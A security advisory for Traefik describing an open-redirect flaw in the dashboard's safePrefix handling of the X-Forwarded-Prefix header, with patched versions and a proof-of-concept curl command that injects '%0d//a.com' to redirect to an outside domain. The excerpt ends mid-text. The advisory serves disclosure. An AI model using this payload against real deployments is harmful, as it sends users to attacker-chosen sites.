Impact There is a vulnerability in Traefik that allows the client to provide the X-Forwarded-Prefix header from an untrusted source. Patches https://github.com/traefik/traefik/releases/tag/v2.11.14 https://github.com/traefik/traefik/releases/tag/v3.2.1 Workarounds No workaround. For more information If you have any questions or comments about this advisory, please open an issue. Original Description ### Summary The previously reported open redirect ([GHSA-6qq8-5wq3-86rp](https://github.com/traefik/traefik/security/advisories/GHSA-6qq8-5wq3-86rp)) is not fixed correctly. The safePrefix function can be tricked to return an absolute URL. ### Details The Traefik API [dashboard component](https://github.com/traefik/traefik/blob/master/pkg/api/dashboard/dashboard.go) tries to validate that the value of the header X-Forwarded-Prefix is a site relative path: “`go http.Redirect(resp, req, safePrefix(req)+"/dashboard/", http.StatusFound) “` “`go func safePrefix(req *http.Request) string { prefix := req.Header.Get("X-Forwarded-Prefix") if prefix == "" { return "" } parse, err := url.Parse(prefix) if err != nil { return "" } return parse.Path } “` ### PoC An attacker can bypass this by sending the following payload: “`bash curl -v 'https://traefik.localhost' -H 'X-Forwarded-Prefix: %0d//a.com' […] > HTTP/1.1 302 Found > Location: //a.com/dashboard/ “` or similar: “`bash curl -v 'https://traefik.localhost' -H…Read More
